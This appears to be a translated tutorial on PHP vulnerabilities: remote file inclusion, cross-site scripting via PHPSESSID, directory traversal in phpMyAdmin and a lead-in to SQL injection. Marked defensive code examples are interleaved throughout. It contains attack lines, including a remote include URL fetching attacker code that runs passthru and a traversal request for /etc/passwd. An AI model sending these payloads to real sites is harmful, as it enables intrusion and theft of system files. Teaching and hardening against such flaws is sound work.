PHP Page Vulnerability Analysis and Related Problem Solving

Source: Internet
Author: User

In network security today, the web page vulnerabilities we pay the most attention to and encounter most often are probably those in ASP; in that area small bamboo is the expert, and I have nothing to add. PHP, however, also has serious security problems, yet there are not many articles about them. So here, let's talk a little about vulnerabilities in PHP pages.

I have summarized the PHP vulnerabilities that are common at present. They fall roughly into the following categories: file inclusion vulnerabilities, script command execution vulnerabilities, file leak vulnerabilities, SQL injection vulnerabilities, and so on. Some generic techniques, such as cookie spoofing, are not discussed here; material on them is available online. So let's go through them one by one and analyze how these vulnerabilities are exploited!

First, we'll discuss the file inclusion vulnerability. It can be said to be unique to PHP. It is caused by inadequate handling of externally supplied malicious data, which can allow remote attackers to execute arbitrary commands on the system with the privileges of the web process. Let's look at an example. Suppose a.php contains code like this:

The following is a reference fragment:

<?php
include($include . "/xxx.php");
?>

In this code, $include is normally a path that has already been set, but we can construct a path ourselves to carry out the attack. Say we submit a.php?include=http://web/b.php, where web is the space we use for the attack and b.php is, of course, the code we attack with. In b.php we can write code similar to passthru("/bin/ls /etc");. In this way, some purposeful attacks can be carried out. (Note: that web server must not be able to execute PHP code, otherwise there will be a problem.) For more information, see << How to attack a common vulnerability in a PHP program >>. Many applications have had this vulnerability, for example: PayPal Store Front, HotNews, Mambo Open Source, PhpDig, YaBB SE, phpBB, Invision Board, Solmetra SPAW Editor, Les Visiteurs, PhpGedView, X-Cart, and so on.
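A hardened form of the a.php include, as an added example that is not code from the original article: the request value only selects a key in a fixed allowlist and never becomes part of the path. The module names, the modules directory and the function name resolve_include are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example (not from the original article). Names and paths are hypothetical.

// Vulnerable pattern from the article, for comparison (do not use):
//   include($include . "/xxx.php");   // $include comes straight from the request

// Fixed map from a public name to a directory that ships with the application.
const INCLUDE_ALLOWLIST = [
    'news'  => __DIR__ . '/modules/news',
    'forum' => __DIR__ . '/modules/forum',
];

/**
 * Return the file to include for a requested module name, or null to refuse.
 * The request value is only ever used as an array key.
 */
function resolve_include($requested): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, INCLUDE_ALLOWLIST)) {
        return null;   // rejects URLs, "../" sequences, arrays, anything unknown
    }
    return INCLUDE_ALLOWLIST[$requested] . '/xxx.php';
}

// Constructed sample inputs: one legitimate value, the article's remote URL,
// and a relative path.
foreach (['news', 'http://web/b.php', '../../etc'] as $sample) {
    $path = resolve_include($sample);
    printf("%-20s => %s\n", $sample, $path ?? 'REFUSED');
}

// In a.php the include then becomes:
//   $path = resolve_include($_GET['include'] ?? null);
//   if ($path === null) { http_response_code(400); exit; }
//   include $path;
```

Independently of the code, allow_url_include = Off in php.ini (the default since PHP 5.2) stops include from fetching http:// URLs, but it does not stop local path manipulation, so the allowlist is still needed.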

Next, let's look at the script command execution vulnerability. It arises because URI parameters submitted by the user are not adequately filtered; submitting data that contains malicious HTML code can lead to a cross-site scripting attack and may expose the target user's sensitive information. Again an example: in PHP Transparent, in PHP versions below 4.3.1, the index.php page does not adequately filter PHPSESSID, and we can use the following to carry out the attack: http://web/index.php?PHPSESSID="> In the script we can construct a function to obtain some of the user's sensitive information. There are somewhat fewer cases of this vulnerability; besides PHP Transparent there are also PHP-Nuke, phpBB, PHP Classifieds, PHPix, Ultimate PHP Board, and so on.
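How a page can handle a PHPSESSID value taken from the URL so that the "> prefix above cannot break out of the markup, as an added example that is not code from the original article. The function names and the length bounds on the ID are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not from the original article). Function names are hypothetical.

/**
 * Accept only values shaped like a PHP-generated session ID.
 * The length bounds are an assumption; match them to your session settings.
 */
function is_plausible_session_id($value): bool
{
    return is_string($value)
        && preg_match('/\A[A-Za-z0-9,-]{16,256}\z/', $value) === 1;
}

/**
 * Build a link that carries the session ID, encoding it first for the URL
 * and then for the HTML attribute it is written into.
 */
function session_link(string $page, string $sid): string
{
    $href = $page . '?PHPSESSID=' . rawurlencode($sid);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">next</a>';
}

// Constructed inputs: a well-formed ID, and the attribute-breaking prefix
// from the article followed by harmless markup.
$samples = ['0123456789abcdef0123456789abcdef', '"><b>injected</b>'];

foreach ($samples as $sid) {
    if (!is_plausible_session_id($sid)) {
        // Refuse the ID; a real page would start a fresh session here.
        echo 'rejected: ', htmlspecialchars($sid, ENT_QUOTES, 'UTF-8'), "\n";
        continue;
    }
    echo session_link('index.php', $sid), "\n";
}

// Even if validation were skipped, the two encoding steps keep the value inert:
echo session_link('index.php', $samples[1]), "\n";
```

Setting session.use_only_cookies = 1 and session.use_trans_sid = 0 in php.ini keeps PHP from accepting or emitting session IDs in URLs at all.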

Then we'll look at the file leak vulnerability. It is caused by inadequate filtering of user-submitted parameters, which remote attackers can use to perform directory traversal attacks and obtain sensitive information. Take the recently discovered phpMyAdmin issue as an example. In phpMyAdmin, the export.php page does not adequately filter the user-submitted 'what' parameter; by submitting data containing multiple '../' sequences, a remote attacker can bypass the web root restriction and view arbitrary files on the system with the web server's permissions. For example, entering an address such as export.php?what=../../../../../../etc/passwd%00 achieves the file leak. There are a few more cases of this kind, such as myPHPNuke, McNews, and so on.
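One way to resolve a parameter such as 'what' to a file without allowing traversal, as an added example that is not phpMyAdmin's code: reject NUL bytes, accept only a plain identifier, then confirm the canonical path is still inside the base directory. The directory layout, the handler file names and the function name resolve_export_handler are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not phpMyAdmin's code). Directory layout and names are hypothetical.

/**
 * Map a user-supplied export type to a handler file inside $baseDir.
 * Returns the canonical path, or null when the value must be refused.
 */
function resolve_export_handler(string $baseDir, $what): ?string
{
    // 1. Type and NUL check: "%00" in a URL arrives decoded as a "\0" byte.
    if (!is_string($what) || $what === '' || strpos($what, "\0") !== false) {
        return null;
    }
    // 2. Shape check: a plain identifier, so '/', '\' and '.' cannot appear.
    if (preg_match('/\A[a-z0-9_]{1,32}\z/', $what) !== 1) {
        return null;
    }
    // 3. Canonicalise and confirm the result is still inside the base directory.
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $what . '.php');
    if ($base === false || $full === false) {
        return null;                       // handler does not exist
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // e.g. a symlink pointing outside
    }
    return $full;
}

// Constructed demo: a temporary directory holding one handler file.
$dir = sys_get_temp_dir() . '/export_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/sql.php', "<?php // handler stub\n");

$samples = ['sql', '../../../../../../etc/passwd' . "\0", '../sql', 'csv'];
foreach ($samples as $s) {
    $r = resolve_export_handler($dir, $s);
    echo json_encode($s), ' => ', $r === null ? 'REFUSED' : 'OK ' . basename($r), "\n";
}

unlink($dir . '/sql.php');
rmdir($dir);
```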

Finally, we come back to the most exciting part. Think how cool SQL injection in ASP pages usually is. We used to inject by hand, until small bamboo worked out "SQL injection Gupta" (hehe) and then developed NBSI, after which our NB Alliance really carved out a place of its own. We have helped CSDN, Tycoon Forum, China Channel and other large websites find vulnerabilities. (Enough of this nonsense, I digress a bit ...)
